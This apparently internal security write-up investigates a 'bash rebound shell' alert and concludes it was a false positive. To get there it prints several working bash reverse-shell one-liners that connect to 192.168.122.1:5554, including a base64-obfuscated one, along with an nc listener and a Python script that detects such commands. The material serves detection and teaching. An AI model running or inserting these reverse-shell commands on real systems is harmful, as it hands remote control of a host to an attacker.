
One, Cause

(1) Alarm Information

The security detection system on one of our hosts produced an alert named "bash rebound shell":

Initiator: IP1

Rebound Connection Command: /bin/bash /usr/bin/egrep -i processor|core id|physical id

Receiving Host: IP2 (80)

(2) Statement of the Problem

Is the command in this alert actually a rebound shell? What are the criteria for judging a bash rebound shell?

Below we make a brief study of the common ways a bash rebound shell is implemented and summarize the criteria for judging one, in preparation for similar events in the future.

Two, The Concept of Rebound Shell

(1) What Is a Rebound Shell

A rebound shell (reverse shell) works as follows: the control end listens on a specified TCP/UDP port, the controlled end actively connects to that listening port and hands its local command shell over to the control end. It is the "reverse" of forward shells such as telnet and ssh: the roles of client and server in the traditional model are swapped.


(2) Applicable Scenarios of Rebound Shell

  • The compromised host sits behind a firewall that forbids inbound connections from the external network but allows the host to initiate outbound connections.
  • The IP address of the compromised host is dynamic; the attacker would lose the connection whenever the IP changes.
  • The compromised host is on an internal network and reaches the external network through address translation, so an external host cannot connect to it directly.
  • The chosen port on the compromised host is already occupied, so the Trojan backdoor cannot listen on its preset port.

Three, File Descriptors and Redirection

File descriptors (File Descriptor, fd) in Linux are defined as follows:

  • File descriptor 0 is standard input, which defaults to the keyboard
  • File descriptor 1 is standard output, which defaults to the screen
  • File descriptor 2 is standard error, which defaults to the screen

Linux only predefines descriptors 0 to 2; descriptors from 3 upward are free for the process to assign. See the following example:

echo "12345678" > file.txt

exec 3<file.txt

grep "1234"<&3;

Output:

12345678

Explanation:

echo "12345678" > file.txt // Redirect 12345678 into file.txt, creating the file and writing the content

exec 3<file.txt // Create file descriptor 3 and point it at file.txt

grep "1234"<&3 // Use the file that descriptor 3 points to as the input of grep; the query returns the matching line
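To make the descriptor mechanics concrete, here is an added Python example (not part of the original article) that performs the same operations the shell does behind exec 3<file.txt, grep <&3 and 0>&1: opening a file onto a chosen descriptor number and duplicating one descriptor onto another with dup2. It uses a temporary file in place of the socket that /dev/tcp/HOST/PORT would open, and shows that a duplicated descriptor is a second name for the same open file, sharing its read position, which is why 0>&1 in the examples below makes standard input read from the very connection that standard output writes to.

```python
import os
import tempfile


def lowest_free_fd(start=3):
    """Lowest descriptor number >= start with nothing bound to it.

    0, 1 and 2 are the predefined streams; everything from 3 upward is free
    for the process to assign, which is what `exec 3<file` relies on.
    """
    fd = start
    while True:
        try:
            os.fstat(fd)        # succeeds only if something is open on fd
        except OSError:
            return fd           # EBADF: this number is unused
        fd += 1


def bind_file_to_fd(path, fd, flags=os.O_RDONLY):
    """Shell `exec N<path` (or `N<>path` with flags=os.O_RDWR): open the
    file and make descriptor N refer to it."""
    tmp = os.open(path, flags)
    if tmp != fd:
        os.dup2(tmp, fd)        # N now names the same open file description
        os.close(tmp)
    return fd


def duplicate_fd(src, dst):
    """Shell `dst<&src` / `dst>&src`: dst becomes a second name for src's open
    file description. Both share one file offset (or one socket)."""
    os.dup2(src, dst)
    return dst


def read_line(fd):
    """Read one line straight from the descriptor with os.read, so no
    Python-level buffering hides the shared offset."""
    buf = bytearray()
    while True:
        b = os.read(fd, 1)
        if not b or b == b"\n":
            return buf.decode()
        buf += b


def demo():
    """Constructed demonstration: a temporary file stands in for the socket
    that /dev/tcp/HOST/PORT would open in a reverse shell."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
        f.write("12345678\nsecond line\nthird line\n")
        path = f.name
    try:
        n = lowest_free_fd()            # e.g. 3 when nothing else is open
        bind_file_to_fd(path, n)        # exec n<file.txt
        first = read_line(n)            # read <&n
        m = lowest_free_fd(n + 1)
        duplicate_fd(n, m)              # m<&n, the same mechanism as 0>&1
        second = read_line(m)           # continues where n left off ...
        third = read_line(n)            # ... and n sees that m advanced it
        os.close(m)
        os.close(n)
    finally:
        os.unlink(path)
    return {"fd": n, "dup_fd": m, "via_fd": first,
            "via_dup": second, "via_fd_again": third}


if __name__ == "__main__":
    print(demo())
```

Because the two descriptors point at one open file description, reading through either one moves the same offset; on a socket the same sharing means that bytes written through descriptor 1 and bytes read through descriptor 0 travel over the one connection.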

Four, Rebound Shell Examples

(1) The compromised host initiates a reverse connection using bash

Example 1:

bash -i >& /dev/tcp/192.168.122.1/5554 0>&1;

Explanation:

bash -i // Create an interactive bash process

/dev/tcp/192.168.122.1/5554 // The "file" being redirected to: establish a connection to port 5554 of 192.168.122.1 (in Linux, network connections are treated as files too)

>& // cmd >& file is equivalent to cmd > file 2>&1, i.e. both the standard output and the standard error of bash are redirected to the file, here port 5554 of 192.168.122.1

0>&1 // Redirect the standard input of bash to standard output, which already points at port 5554 of 192.168.122.1; thus 192.168.122.1 receives the standard input, standard output and standard error of the compromised host, achieving a reverse shell

Example 2:

bash -i 5<>/dev/tcp/192.168.122.1/5554 0>&5 1>&5;

Explanation:

bash -i // Create an interactive bash process

5<>/dev/tcp/192.168.122.1/5554 // Point file descriptor 5 to the 5554 port of 192.168.122.1

0>&5 // Redirect the standard input to file descriptor 5, which is the 5554 port of 192.168.122.1

1>&5 // Redirect the standard output to file descriptor 5, which is the 5554 port of 192.168.122.1

Thus 192.168.122.1 gets the standard input and standard output of the compromised host; although standard error is not redirected, this still achieves a reverse shell.

Example 3:

exec 5<>/dev/tcp/192.168.122.1/5554

cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done

Explanation:

exec 5<>/dev/tcp/192.168.122.1/5554 // Redirect file descriptor 5 to the 5554 port of 192.168.122.1

cat <&5 // Use cat to read the content of file descriptor 5, which means reading the input from the 5554 port of 192.168.122.1

| // Pipeline character, use the result of cat as the input for the following command

while read line 0<&5; do $line 2>&5 >&5; done // In the loop, read each line from file descriptor 5, execute it as a command, and redirect its standard error (2>&5) and standard output (>&5) to file descriptor 5, i.e. port 5554 of 192.168.122.1

Example 4:

0<&56-;exec 56<>/dev/tcp/192.168.122.1/5554;sh <&56 >&56 2>&56;

Although an error is printed, the reverse connection succeeds.

Explanation:

0<&56- // Redirect standard input to file descriptor 56 and then close 56 (the trailing "-" moves the descriptor); at this point 56 has not been opened yet, which is the source of the error mentioned above

exec 56<>/dev/tcp/192.168.122.1/5554 // Point file descriptor 56 at port 5554 of 192.168.122.1

sh <&56 >&56 2>&56 // Standard input is redirected to file descriptor 56, and standard output and standard error are also redirected to file descriptor 56

Example 5:

Base64-encode the reverse connection command

bash -i >& /dev/tcp/192.168.122.1/5554 0>&1;

Encoded as:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzU1NTQgMD4mMQ==}|{base64,-d}|{bash,-i}

(2) The attacker listens for the reverse connection on a VPS

// Listen on local port 5554; the shell is obtained once the reverse command runs on the compromised host

nc -l -p 5554

Obtained a reverse shell.

Five, Summary

The study above shows that a successful bash reverse connection requires two things: the command must name the IP address and listening port of the VPS to connect back to, and it must redirect the standard input, standard output and standard error of the compromised host's command line to that VPS. The bash command in the earlier alert names no remote host or port and performs no redirection at all, so it is not a reverse shell and the alert can be judged a false positive.
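To turn these judging criteria into something an analyst can run over alert data, the following added Python script (not from the original article) traces a command line's redirections the way the examples above were read by hand: it looks for a /dev/tcp or /dev/udp endpoint, follows which descriptors end up bound to it (including through intermediate descriptors such as 5 or 56 and through >& duplications), decodes the brace-expanded base64 form from Example 5, and reports which of stdin/stdout/stderr reach the endpoint. The sample inputs are the five example commands and the alert command from this article; the verdict rule (an endpoint plus at least stdin and stdout bound to it) is this example's own reading of the summary, and it covers bash redirection syntax only, not reverse shells built with other tools.

```python
import base64
import re
from typing import Dict, Optional

# bash opens /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT as sockets when they
# appear as redirection targets: this is the "remote host and port" indicator.
ENDPOINT_RE = re.compile(r"/dev/(tcp|udp)/([^/\s;|]+)/(\d+)")
# A redirection: optional descriptor number, operator, target (path or fd).
REDIR_RE = re.compile(r"(\d*)(<>|>&|<&|>>|>|<)\s*([^\s;|&<>]+)")
# The brace-expansion obfuscation from Example 5: {echo,<base64>}|{base64,-d}
BRACE_B64_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}")


def decode_brace_base64(cmd: str) -> Optional[str]:
    """Recover the command hidden in the {echo,...}|{base64,-d} form, if any."""
    m = BRACE_B64_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return None


def trace_redirections(cmd: str) -> Dict[int, str]:
    """Walk the redirections left to right and return fd -> current target.

    `N<path`, `N>path`, `N<>path` bind a descriptor to a path; `N>&M` and
    `N<&M` make N a duplicate of M, so N inherits whatever M is bound to at
    that moment. Duplicating a descriptor that is not yet open (as `0<&56-`
    does before 56 exists in Example 4) leaves N unbound.
    """
    bindings: Dict[int, str] = {}
    for fd_txt, op, target in REDIR_RE.findall(cmd):
        target = target.rstrip("-")  # `<&56-` moves 56; the source is still 56
        is_dup = op in (">&", "<&") and target.isdigit()
        if fd_txt:
            dsts = [int(fd_txt)]
        elif op == ">&":
            dsts = [1, 2]            # bare `>&` covers stdout and stderr
        elif op in ("<", "<>", "<&"):
            dsts = [0]
        else:
            dsts = [1]
        for dst in dsts:
            if is_dup:
                src = int(target)
                if src in bindings:
                    bindings[dst] = bindings[src]
                else:
                    bindings.pop(dst, None)
            else:
                bindings[dst] = target
    return bindings


def classify(cmd: str) -> dict:
    """Apply the two criteria from the summary: a remote endpoint must be
    named, and the standard streams must be redirected to it."""
    decoded = decode_brace_base64(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    endpoints = [f"{proto}://{host}:{port}"
                 for proto, host, port in ENDPOINT_RE.findall(text)]
    bindings = trace_redirections(text)
    std_fds = sorted(fd for fd, tgt in bindings.items()
                     if fd in (0, 1, 2) and ENDPOINT_RE.search(tgt))
    return {
        "endpoints": endpoints,
        "decoded": decoded,
        "std_fds_to_endpoint": std_fds,
        # stdin and stdout over the socket suffice for an interactive shell
        # (Example 2 has no stderr); no redirection at all means no shell.
        "is_reverse_shell": bool(endpoints) and {0, 1} <= set(std_fds),
    }


# Sample inputs: the five example commands and the alert command from this article.
EXAMPLE_1 = "bash -i >& /dev/tcp/192.168.122.1/5554 0>&1;"
EXAMPLE_2 = "bash -i 5<>/dev/tcp/192.168.122.1/5554 0>&5 1>&5;"
EXAMPLE_3 = ("exec 5<>/dev/tcp/192.168.122.1/5554\n"
             "cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done")
EXAMPLE_4 = "0<&56-;exec 56<>/dev/tcp/192.168.122.1/5554;sh <&56 >&56 2>&56;"
EXAMPLE_5 = ("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzU1NTQgMD4mMQ==}"
             "|{base64,-d}|{bash,-i}")
ALERT_COMMAND = "/bin/bash /usr/bin/egrep -i processor|core id|physical id"

if __name__ == "__main__":
    for name, cmd in [("example 1", EXAMPLE_1), ("example 2", EXAMPLE_2),
                      ("example 3", EXAMPLE_3), ("example 4", EXAMPLE_4),
                      ("example 5", EXAMPLE_5), ("alert", ALERT_COMMAND)]:
        print(name, classify(cmd))
```

Run against the alert command, the script finds no endpoint and no redirection and returns is_reverse_shell False, matching the false-positive verdict; the five examples all resolve to the endpoint tcp://192.168.122.1:5554, with Example 2 flagged as lacking stderr (std_fds_to_endpoint is [0, 1]).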


Last modified by:
admin